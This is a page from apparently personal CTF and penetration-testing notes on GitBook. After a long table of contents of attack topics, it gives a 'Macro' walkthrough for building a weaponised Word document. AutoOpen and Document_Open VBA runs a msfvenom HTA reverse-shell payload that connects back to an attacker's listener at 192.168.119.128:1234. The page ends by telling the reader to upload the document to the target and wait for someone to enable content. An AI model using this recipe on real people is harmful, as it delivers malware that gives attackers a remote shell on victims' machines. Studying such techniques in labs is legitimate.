Windows, Linux, and Active Directory CTF Notes
  • Table of Content
  • Word of Wisdom
  • Enumeration
    • Initial enums
    • Q check on open port response
    • Q password spray
    • Q SMB NTLMv2 Theft
    • Scan behind a squid proxy
    • Port 80/443 - Web
      • CTF - param abuse
      • GitHub content access
    • Port 21 - FTP
    • Port 22 - SSH
      • Symlink and Debian OpenSSL Predictable PRNG
      • SSH private key crack
      • Create a key copy w/o pwd
    • Port 25 - SMTP
    • Port 53 - DNS
    • Port 69 - UDP/TFTP
      • AT-TFTP Server 1.9
    • Port 79 - Finger
    • Port 88 - Kerberos
    • Port 110 - Pop3
    • Port 111 - Rpcbind/portmapper
    • Port 161 - SNMP
    • Port 139/445 - SMB
    • Port 143/993 - IMAP
    • Port 161/162 - UDP/SNMP
    • Port 389/636 - LDAP
    • Port 873 - rsync
    • Port 2049 - NFS
    • Port 3306 - Mysql
    • Port 1403 - MSSQL
    • Port 5437 - Postgres
    • Port 6379 - Redis
    • Port 3389 - RDP
    • Port 5985,5986 - WinRM
    • Port 1098/1099- Pentesting Java RMI
    • Port Knocking
  • Active Directory
    • Working Directory and Files
    • First Recon
    • User Recon
      • Username bruteforcing
      • Enum SMB Shares
      • SMB Responder
    • Init Cred Acess
      • Kerberos Attack w/o password
      • Password Attack
        • Hydra
      • SYSVOL and NETLOGON
    • Init NTLMv2 Theft
    • Kerberos Quick Win
      • Service Account - Kerberoast
      • SMB Replay
    • Domain Recon
      • AD Interesting file location
    • AD Attack Recon
    • Bloodhound Walkthrough
      • Common Usage
      • Manual Path Analysis
      • AD-Miner
      • ACL Abuse
    • Kerberos Attack
      • Kerberoast
      • ASREProast
      • Get the ticket
      • Pass the ticket
      • Overpass-the-hash Attack
      • Kerberos based Enum and Attack Samples
      • Silver Ticket
        • CTF: Silver Ticket - Privilege Escalation
      • Golden Ticket
        • CTF: Golden Ticket Walkthrough
    • ACL Abuse
      • ForcePasswordChange
      • ACL Abuse and Shadow Credential
      • Resource Based Constrained Delegation
    • Group Policy Abuse
      • GPO modification attack
      • GPP (Group Policy Preference) credential discovery
    • Logon Script Abuse
    • ADCS attacks
    • KrbRelayUp
    • Azure Connect Exploit
    • gMSA account
    • Dumping Domain Credentials
      • Secretdump.py
      • ntdsutil.exe - no credential required
      • Diskshadow - No credential required
      • vssadmin - no credential required
      • Wmic and Vssadmin Shadow Copy
      • Mimikatz
  • Windows Priv
    • Quick win
      • Local Service to SYSTEM
    • Initial Harvesting - Usual Spots
    • UAC Bypass
      • UACME - Best
    • Enable Privileges
    • Local Enumeration
      • Page
      • .Net Version Check
      • File and Directory permissions
    • Other quick wins
    • Service Privilege Escalation
    • Scheduled Tasks
    • Token Abuse
      • SeBackup (with SeRestorePrivilege)
      • SeManageVolumePrivilege
      • SeRetorePrivilege
      • SeTakeOwnership
      • SeDebugPrivilege
    • Runas
    • Potato
    • GMSA password retrieval
    • LAPS password
    • MySQL
      • Write permission
      • Library - MySQL UDF
  • Linux Priv
    • Common Tips
      • Local File Enumeration
    • Quick win - Sudo -l
    • READ Source code & binary
    • Local Enumeration Tools
    • Sudo
      • GTFOBins - Sudo
      • LD_PRELOAD
      • LD_LIBRARY_PATH
      • Sudo via intended functionality
      • Sudo 1.8.27 Security Bypass
      • CVE 2019-18634 (Buf Overflow)
      • CVE 2021-3156 (Heap Overflow)
    • SUID / SGID Files
    • Weak File Permissions
      • Writeable /etc/passwd
      • Readable /etc/shadow
      • Writeable scripts - run by root
    • Cron Jobs
      • PATH environment abuse
      • PATH environment abuse 2
      • Wildcard and cronjob
    • Password Hunting
    • ld.so PrivEsc Example
    • Add more from basic to modern
    • No_root_squash option
    • Ansible
    • YAML
    • Docker
      • Docker escape
      • lxd/lxc group
      • Moby Docker Engine PrivEsc
    • Git
    • Python Code Injection
    • Apache Conf Privilege Escalation
  • Credential Access
    • Default password and common password
    • Password cracking
      • Hash Cracking Techniques
      • Linux shadow
      • Linux shadow passwd
      • Windows - SAM hash
      • Windows - SecureString in Powershell
      • SSH id_rsa
      • Zip
      • PDF
      • Office
      • KeePass database
      • JWT Token
      • VNC
    • Brute-Force attack
    • Password spraying
    • Extract credentials from images
  • Pivoting / Network
    • Ligolo-ng
      • Local ports(127.0.0.1)
    • SSH
      • SSH key gen for remote port forwarding
      • ssh permission
    • Quick port-scan
    • sshuttle
    • Ping check
  • File Transfer
    • Recursive Download
    • Recursive Read
    • Zip/Unzip
  • Web Attacks
    • Web Enumeration
    • File Upload
      • File Upload with reverse shell
      • File Extension Discovery for upload
      • File Upload Bypass
        • .htaccess to allow extension
        • File Upload Bypass Checklist
    • SQL Injection
      • sqlmap
    • LFI/RFI
      • Concept
      • Log poisoning
      • PHP Wrapper
      • Dir Enumeration
    • Command Injection
    • XSS
    • Mass Assignment
    • WebDAV
  • Database Attacks
    • MySQL
      • Privilege Escalation - MySQL 4.x/5.0
    • MSSQL
      • sqsh
      • mssqlclient
      • Responder
      • Directory Enumeration
    • Postgresql
    • Oracle
    • Redis
      • PHP web-shell
      • SSH key push
      • Cron job
      • Load Redis module
    • Mongo
    • KeePass kdbx
    • SQLite
  • Metasploit
    • Basic Usage
    • msfvenom
    • Local Exploit Suggester
    • Update Metasploit
  • File Enum & Hunting
    • Linux - Local Password/Files
    • Win - Local Passwords/Files
    • SSH
    • Binary/Image Analysis
  • Unix Commands
    • awk and sed
    • grep, cut, list size, and sort
    • archive, compress, and extract
  • Code Analysis
    • Framework Checker
    • Access to Source Code
    • Windows exe disassebler
  • Reverse Shell
    • Open Port Check
  • Remote Access & Lateral Movement
  • RCE Collection
    • Linux
      • Shellshock
      • preg_replace() in PHP
      • Asset () in PHP
      • Eval() in Ruby
      • Eval() in Python
      • str() in Python
    • Windows
      • Macro
      • MS17-010
      • ViewState
    • CMS and Platform
      • WebDav
      • Jenkins / askjeeves
      • H2 Database Engine
      • WordPress
      • Tomcat
      • Joomla!
    • Software
      • ClamAV
  • Compiling
    • C# example - Generic
    • C# example - Run
  • Interactive Shell
  • Reverse Shell
  • Post Exploitation
    • Backdoor
    • Secrentsdump.py
    • mimikatz
    • meterpreter - mimikatz
    • samdump2
    • spraykatz
Powered by GitBook
On this page
  • Preparation
  • Execution
  1. RCE Collection
  2. Windows

Macro

PreviousWindowsNextMS17-010

Last updated 1 year ago

Preparation

  • Install Office.

  • Create a Word document, called Evil.doc.

  • Open a Macros from View menu. Select 'Evil' document in Macros in:

  • Insert your macro name, 'MyMacro' in the Macro name: and then click 'Create'

  • This will take you to a VB editor.

  • Add the following script to your new macro. 

    Sub AutoOpen() 
  MyMacro 
End Sub 
Sub Document_Open() 
  MyMacro 
End Sub

  • Create a reverse shell payload with hta extension via msfvenom

# Kali
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.128 LPORT=1234 -f hta-psh -o evil.hta

  • Make them readable with a python script. Download hta2macro.py. 

# Kali
python hta2macro.py evil.hta

  • Copy the split string to the Macro and add some commands in the Macro. 

# Office Macro Editor
Dim Str As String

<Your string here>

CreateObject("Wscript.Shell").Run Str

End Sub

  • and save it as Word 97 format.

  • When you check the macro again, you see the following scripts.

  • Set up a netcat listener to validate your macro to work. 

# Kali
nc -nlvp 1234

  • Open the word document.

  • Click Enable Content.

  • Kali machine, you will see the connection.

Execution

  • Check your macro 

# Kali
sudo pip install -U oletools
olevba evil.doc

# Check if your macro exists

  • Set up a netcat listener again, upload the document to your target location, and wait until someone opens the document and enable content.